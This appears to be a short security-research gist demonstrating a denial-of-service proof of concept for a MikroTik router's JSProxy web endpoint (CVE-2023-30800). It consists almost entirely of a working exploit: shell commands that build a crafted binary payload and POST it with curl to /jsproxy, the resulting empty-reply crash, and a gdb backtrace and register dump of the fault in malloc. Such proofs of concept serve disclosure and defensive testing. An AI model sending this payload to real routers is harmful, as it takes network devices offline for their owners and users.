@j-baines
Created September 7, 2023 15:01
MikroTik JSProxy Denial of Service (CVE-2023-30800)
albinolobster@mournland:~$ echo -en "\x00\x00\x00\x00\x00\x00\x00\x00\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e" > /tmp/webfig-crash.bin
albinolobster@mournland:~$ curl -v -X POST -H "Content-Type: msg" --data-binary @/tmp/webfig-crash.bin http://10.12.70.1/jsproxy
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.12.70.1:80...
* TCP_NODELAY set
* Connected to 10.12.70.1 (10.12.70.1) port 80 (#0)
> POST /jsproxy HTTP/1.1
> Host: 10.12.70.1
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Type: msg
> Content-Length: 40
>
* upload completely sent off: 40 out of 40 bytes
* Empty reply from server
* Connection #0 to host 10.12.70.1 left intact
curl: (52) Empty reply from server

Stack trace:

(gdb) bt
#0  0x7757d9a0 in ?? () from /lib/libc.so.0
#1  0x7757cd82 in malloc () from /lib/libc.so.0
#2  0x7752b71a in JSProxyServlet::doPost(Context&, Request const&, Response&) () from /nova/lib/www/jsproxy.p
#3  0x080582a7 in Servlet::doMethod(Context&, Request const&, Response&) ()
#4  0x08056700 in www::Connection::run() ()
#5  0x080568d5 in www::runConnection(void*) ()
#6  0x08057664 in Looper::threadLoop(Thread*) ()
#7  0x0805775b in ?? ()
#8  0x7777f435 in ?? () from /lib/libpthread.so.0
#9  0x7777a6d2 in clone () from /lib/libpthread.so.0
(gdb) info registers
eax            0x8063db8        134626744
ecx            0x55555594       1431655828
edx            0x1      1
ebx            0x7758a000       2002296832
esp            0x775520c8       0x775520c8
ebp            0x775520ec       0x775520ec
esi            0x7758bf00       2002304768
edi            0x8063dc8        134626760
eip            0x7757d9a0       0x7757d9a0
eflags         0x10283  [ CF SF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51